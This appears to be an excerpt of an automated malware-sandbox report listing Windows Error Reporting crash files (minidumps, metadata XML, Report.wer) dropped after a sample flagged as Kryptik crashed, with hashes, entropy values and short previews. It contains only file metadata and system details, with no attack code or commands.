                                                            C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_SecuriteInfo.com_a455d2dc16ddc59dc025e53de7238c64ae79f0e5_3aafbe1c_c0fb8f11-2a05-4d8e-aa9e-c3816a9fa8f8\Report.wer

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):65536
                                                            Entropy (8bit):1.0215340124938246
                                                            Encrypted:false
                                                            SSDEEP:192:HQkd7GolHHj0wS+tU8juQ90zuiFlZ24IO8a:wkdSolHHQ3SU8jqzuiFlY4IO8a
                                                            MD5:BE97CA387AA917A4DB0B1FAA44A26F34
                                                            SHA1:E90FEF6D8AEECBFF8E44DECB829E63E7641B1406
                                                            SHA-256:513BE98FA813DB77A8A8D41BC248227736455D9832E32FB732D5ED8CF0108D74
                                                            SHA-512:FAC0AB2F58AA0D25A79F1848E9F85F0D0A2A8EECA222B2F4F23E1347D3F519549CEFB157DB315CAB7B8FB3CF939D54F83C4074EB8A0261DE20D8592130FAF943
                                                            Malicious:false
                                                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.8.4.8.5.2.4.9.7.9.5.1.7.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.1.3.1.0.7.2.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.0.f.b.8.f.1.1.-.2.a.0.5.-.4.d.8.e.-.a.a.9.e.-.c.3.8.1.6.a.9.f.a.8.f.8.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.d.d.1.b.6.4.7.-.4.c.a.a.-.4.5.2.0.-.9.2.c.6.-.2.c.b.a.9.6.7.2.7.1.3.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...W.3.2...K.r.y.p.t.i.k...L.K.E...g.e.n...E.l.d.o.r.a.d.o...1.7.6.4.1...1.7.6.7.7...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.c.5.0.-.0.0.0.1.-.0.0.1.4.-.a.4.a.b.-.d.a.2.f.5.9.1.9.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.c.2.a.a.2.4.2.4.b.3.b.f.a.1.f.c.2.c.4.9.2.b.2.9.9.e.0.1.e.5.b.b.0.0.0.0.f.f.f.f.!.0.0.0.0.5.8.b.a.4.5.0.6.c.d.b.7.8.6.f.c.0.b.1.5.d.4.7.1.7.5.3.5.e.6.4.6.3.2.0.6.f.9.7.5.!.S.e.c.u.r.i.t.e.I.n.f.o...c.

                                                            C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_SecuriteInfo.com_da60af89a9fee28cf7d277ee3641e37315f7f8e_3aafbe1c_00c911f6-5e77-4bda-a691-ffd6c73862b1\Report.wer

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):65536
                                                            Entropy (8bit):1.0195080852229206
                                                            Encrypted:false
                                                            SSDEEP:192:QLd7GoGSH90wS+tU8juQ90zuiFlZ24IO8n:GdSoGSH+3SU8jqzuiFlY4IO8n
                                                            MD5:96B90AA9AC14E1A88AFA15DFD6E56BAC
                                                            SHA1:881F728186E372EF69B287D83C6AC6399041F178
                                                            SHA-256:39A83F49A2A9C5B8C593CBBC2F55A17FF3610642BCF71610DB2A8F978315DC60
                                                            SHA-512:63065A998CB8E0CB2D237FC56D3A1625BA27480C058D23EE4E88380869C957AC5E41E48208F751CDFCC7948F52063E36FA77F45FC19C4B12C4D32C77F13B8985
                                                            Malicious:false
                                                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.8.4.8.5.2.6.5.1.7.7.5.2.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.2.8.4.8.5.2.6.9.7.0.8.9.6.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.0.c.9.1.1.f.6.-.5.e.7.7.-.4.b.d.a.-.a.6.9.1.-.f.f.d.6.c.7.3.8.6.2.b.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.9.a.6.0.2.2.4.-.c.a.3.f.-.4.c.a.a.-.a.c.6.1.-.1.3.9.6.9.c.8.f.c.2.7.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...W.3.2...K.r.y.p.t.i.k...L.K.E...g.e.n...E.l.d.o.r.a.d.o...1.7.6.4.1...1.7.6.7.7...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.c.5.0.-.0.0.0.1.-.0.0.1.4.-.a.4.a.b.-.d.a.2.f.5.9.1.9.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.c.2.a.a.2.4.2.4.b.3.b.f.a.1.f.c.2.c.4.9.2.b.2.9.9.e.0.1.e.5.b.b.0.0.0.0.f.f.f.f.!.0.0.0.0.5.8.b.a.4.5.0.6.c.d.b.7.8.6.f.c.0.b.1.

                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER66C9.tmp.dmp

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                            File Type:Mini DuMP crash report, 14 streams, Tue Oct 8 08:08:03 2024, 0x1205a4 type
                                                            Category:dropped
                                                            Size (bytes):59350
                                                            Entropy (8bit):2.1240495433003503
                                                            Encrypted:false
                                                            SSDEEP:384:tRD2jmzvIrGNfbgZswHmqCFQeZGNl45le8rKb:tl/zvIrGNSfqFQ8GM2
                                                            MD5:6FCA096BEC17A0A898FD4E865FCB9A27
                                                            SHA1:1F15B628BDB9AE5AA7154A90748E09FB84CFA823
                                                            SHA-256:177CB786C0CEDBCE17C50937B6DF6EFFC65402BFEA1DC5FCD430A53C5E880F10
                                                            SHA-512:9A4452F6E5D335890C570D0174E53B6155BA66A17FE850A3B5DF527197840C296C84A222E14E78FB477B53C951C9AE8786371BACBD7ADB37FD38B47ADA586132
                                                            Malicious:false
                                                            Preview:MDMP..a..... .......c..g....................................D....,..........T.......8...........T........... ...........................l...............................................................................eJ..............GenuineIntel............T.......P...^..g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER6776.tmp.WERInternalMetadata.xml

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):8604
                                                            Entropy (8bit):3.708586930364453
                                                            Encrypted:false
                                                            SSDEEP:192:R6l7wVeJwN6i6Y9aSU9fyKgmf6lpBQ89bLhsfzZm:R6lXJ66i6YgSU9f3gmf6nLafA
                                                            MD5:9677335C4ACA3F972E9B7A142FBB37AF
                                                            SHA1:A8FB5F2C245C1859F19D00860E6E31CBB99A95B1
                                                            SHA-256:3B1B6EC3845D90E757AD207E9FC640D823531E82B6C3DF43FBAB1A0DBED4907B
                                                            SHA-512:8AD2F12F0ADC49BF5FDCFFB469CFCA68F8B59BA487DD48F09DD5BA6DED588CB3E5CC8C8F24755DE3A341C34E8EBA5DB4431D8A31A0C8EB8D49316025ED8ED70A
                                                            Malicious:false
                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.1.5.2.<./.P.i.

                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER6796.tmp.xml

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):4955
                                                            Entropy (8bit):4.591182753455992
                                                            Encrypted:false
                                                            SSDEEP:48:cvIwWl8zsMJg77aI9AMSWpW8VYrZYm8M4Jmf/JFNx+q8vD/bFjyIOIAd:uIjfKI7mC7V9JaxKvVFhAd
                                                            MD5:C265B42442953BA4D50A22AE09ABA489
                                                            SHA1:E63394A6373FFE865D6456CBECED4FDAA87AB3A3
                                                            SHA-256:28DA60B25776CF42A61DD70B8365787789DFC691AD179535A05C5671F8257675
                                                            SHA-512:3E2C395314DF45E34136411104655DF0E42CC4719F9D85AB35DDB636CF4EE5135517CCF81E15F6F6BDCC05921C99B55C8E67EA63DCBECD7C65EF3B1188A7C655
                                                            Malicious:false
                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="534190" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER6969.tmp.dmp

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                            File Type:Mini DuMP crash report, 14 streams, Tue Oct 8 08:08:04 2024, 0x1205a4 type
                                                            Category:dropped
                                                            Size (bytes):59242
                                                            Entropy (8bit):2.1518642184241514
                                                            Encrypted:false
                                                            SSDEEP:384:2D2jm1SivxigfogrsJizCFQeZGNl45le+PkC5G:S/MivxigD9eFQ8GMRG
                                                            MD5:EB206569CF2E02266A6376C40F207798
                                                            SHA1:7FC3FA57F7D543E7BE3F18B7E74EB492FAB8A242
                                                            SHA-256:02064B8B8C6CD5E97D4101C91677DA59C2234FC040C0606A66DC46465D12E532
                                                            SHA-512:ABC352CA554428E7DE9A0DCC48B60E75D66F8EBF71A525EBFE34EC09CA9FA997FA89DF5344749E00DC8A68C7D32A480DBCBDD144643619EA7034FB890DD3185B
                                                            Malicious:false
                                                            Preview:MDMP..a..... .......d..g....................................D....,..........T.......8...........T.......................................l...............................................................................eJ..............GenuineIntel............T.......P...^..g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER69C8.tmp.WERInternalMetadata.xml

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):8602
                                                            Entropy (8bit):3.706475764970843
                                                            Encrypted:false
                                                            SSDEEP:192:R6l7wVeJw66w6Y9HSU9fyKgmf6lpBM89bLhsfVZm:R6lXJN6w6YtSU9f3gmf6jLafC
                                                            MD5:9B7042B87D5E87E1E6487B6E85DAC991
                                                            SHA1:F4CD31F0DD9B2D7B859C639CB6500D4DEB961394
                                                            SHA-256:820A4B2620D6029DD594C1AF15719CEE488A79E4E66A95CF86E361C1960FE416
                                                            SHA-512:B67B1F0FE8351183DFB610521E95109AE2DE65CE24DA1DFB82C95443C30BDCFD7C54861036695769609788611AB7CDB0A4DF7DF63D99F5BCAFFB9D1C031296A2
                                                            Malicious:false
                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.1.5.2.<./.P.i.

                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER6A27.tmp.xml

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):4955
                                                            Entropy (8bit):4.59178679706321
                                                            Encrypted:false
                                                            SSDEEP:48:cvIwWl8zsMJg77aI9AMSWpW8VYcYm8M4Jmf/JFi+q8vD/bFjyIOIAd:uIjfKI7mC7VcJ1KvVFhAd
                                                            MD5:AD0EC331E6C2650DB81C4A70B65FF9C1
                                                            SHA1:BE3C7DEF3F9B688DC44CCAC78FA54D963F5E6BAA
                                                            SHA-256:3561330655D0065BBB2D6CD8AB4FD752C339F0C26DCB09F4E18489F3A5FA485A
                                                            SHA-512:783A6423DBC210E684072ED83163511335F29EE8084A246C52AC90C9D93D71A384F5E40D7A7C19243D9E894A5AC435B232CE8D8ED5B66B16790382FB8982722D
                                                            Malicious:false
                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="534190" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER6C19.tmp.dmp

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                            File Type:Mini DuMP crash report, 14 streams, Tue Oct 8 08:08:05 2024, 0x1205a4 type
                                                            Category:dropped
                                                            Size (bytes):68894
                                                            Entropy (8bit):1.903620056146761
                                                            Encrypted:false
                                                            SSDEEP:192:yX48C8PBOCoFZjscmQGyMgQRHeEpPj8MNm+1SLs8leIYUgwOENq7Nc:k4/8P0vnscmQMgwJNl45leIgdi
                                                            MD5:CCAB208432405DB4C584C5FC8624BEA1
                                                            SHA1:EA2021A73C0CCF0C4D17EE1738472290F072DD22
                                                            SHA-256:094E23BF49654A1ED1B827C75B9D3E5A50148329FA091BE7AB795B9AA51DFD2B
                                                            SHA-512:219C5DFCC472E955E91797F62B555726C4BC21E8BA455D79D9A2922F31304BFB8A212AB1EE4AF7AFD0D9CB4CB9F0EF6185DD14B71E7B6614070D625F9C9EC546
                                                            Malicious:false
                                                            Preview:MDMP..a..... .......e..g............T...............\.......$....2..........T.......8...........T...........(...........................................................................................................eJ......d.......GenuineIntel............T.......P...^..g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER6C87.tmp.WERInternalMetadata.xml

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):8602
                                                            Entropy (8bit):3.706167521049113
                                                            Encrypted:false
                                                            SSDEEP:192:R6l7wVeJwI6wQ6Y9nSU9OAgmf6lpBy89bChsfIWm:R6lXJf6wQ6YdSU9OAgmf6BCafQ
                                                            MD5:97ECF618DA545F7E649A123FE0FC5057
                                                            SHA1:E0B1CD3543D951A83287506480650B8E5C31BF4F
                                                            SHA-256:80DC51B2D3D5A9437EFC3E94FAE8F1A94FDCD3B69C7F5E7C4C773AE0EEF4D59D
                                                            SHA-512:DC69E1BC11EB95D85F0CCD9D982582D9FBC15E9562974DFF696EDFD4392F044B118AC5A47CD0CC9E23FCABEBFEECB024FC16CBF80AF9D1FE8781B032B22DDEFF
                                                            Malicious:false
                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.1.5.2.<./.P.i.

                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER6CD6.tmp.xml

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):4955
                                                            Entropy (8bit):4.593168921311553
                                                            Encrypted:false
                                                            SSDEEP:48:cvIwWl8zsMJg77aI9AMSWpW8VYL05Ym8M4Jmf/JF2Vg+q8vD/bFjyIOIAd:uIjfKI7mC7VMJtuKvVFhAd
                                                            MD5:3455F46D27768B91898A184CC61A1473
                                                            SHA1:845FF1101B397577B78821E28D22EFBB88E6BEB4
                                                            SHA-256:C48748576859159151D8B5DA970ADBCBC5223977A93FE279A2ECFD2D38ABF465
                                                            SHA-512:6ADA15729DD11D374BF8B2D780C280296134838CB12BE97093773D68FDC914296805C390D770E4630271F9BE6617034A0CC45FCEC01751983278CC8928744B8A
                                                            Malicious:false
                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="534190" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER70BC.tmp.dmp

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                            File Type:Mini DuMP crash report, 14 streams, Tue Oct 8 08:08:06 2024, 0x1205a4 type
                                                            Category:dropped
                                                            Size (bytes):68470
                                                            Entropy (8bit):1.9196966841812042
                                                            Encrypted:false
                                                            SSDEEP:192:9X8C8PPIKzOCoBHHuzegxGyMgFKgeEpPjxWsOGmXMNm+1SLs8leIYzuvR0pno8q:h/8PPFqvtstMgREsOjcNl45lefuvIXq
                                                            MD5:B0E560231A5A6ECBED347CBE38C06ABC
                                                            SHA1:32ABF616B4C73D91911FDA219E1DD28778FBB773
                                                            SHA-256:7DEE90A327F24392B3B57A6512499847405429D949BF4AB23694903309390B47
                                                            SHA-512:A97287975947A01816C4A661E5213F94835C2F6AF1E1340B4AD081F0B7BA26AC721B1ACB1C66A7E03BA12968481045567C9B4B5B96A56EDA01DAE8238999AD75
                                                            Malicious:false
                                                            Preview:MDMP..a..... .......f..g............T...............\.......4....2..........T.......8...........T...........(...N.......................................................................................................eJ......d.......GenuineIntel............T.......P...^..g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER712A.tmp.WERInternalMetadata.xml

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):8602
                                                            Entropy (8bit):3.7076502399497455
                                                            Encrypted:false
                                                            SSDEEP:192:R6l7wVeJws6wAW6Y9DSU9HAgmf6lpBx89bZhsfIzm:R6lXJr6wJ6YpSU9HAgmf6EZafR
                                                            MD5:98B0244DB04A24CCCFA512E55AECD79D
                                                            SHA1:E87BB0D82C7671A6314A4E95EC8916366F7A4F86
                                                            SHA-256:A334EDCCBAA0F731DC46E41C2B256E67609D6B4782E8C6518974BD081AAE59BF
                                                            SHA-512:BFF051245A4E61E3FB34953F0611BA7E2CEB01FB6E94D09BFD25D3FD962AA1586AC1E8B944DFECC0E7735B2014AC3C74C4D60452C6CE6A7E74A0E1990B289C43
                                                            Malicious:false
                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.1.5.2.<./.P.i.

                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER715A.tmp.xml

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):4955
                                                            Entropy (8bit):4.591829272365948
                                                            Encrypted:false
                                                            SSDEEP:48:cvIwWl8zsMJg77aI9AMSWpW8VYdYm8M4Jmf/JFU+q8vD/bFjyIOIAd:uIjfKI7mC7VhJPKvVFhAd
                                                            MD5:1A75BACE79CF7C5717AAB25E7C878654
                                                            SHA1:E67DDABB0084A18142715970712378FACD8399C4
                                                            SHA-256:D83D38EB7200DE5BDF383295BA3FD5C06B7F637DA2B61A96D6A157D1909A07E6
                                                            SHA-512:F59F902CCAD1D8AF2372A77CA489EABADE85F7ECF479A92AD6BC7B4DB0B0FBF7D7D89FEFD8304C7CF594B416E60359580FF5FABD4D95E9F88DFFE38581AA1E98
                                                            Malicious:false
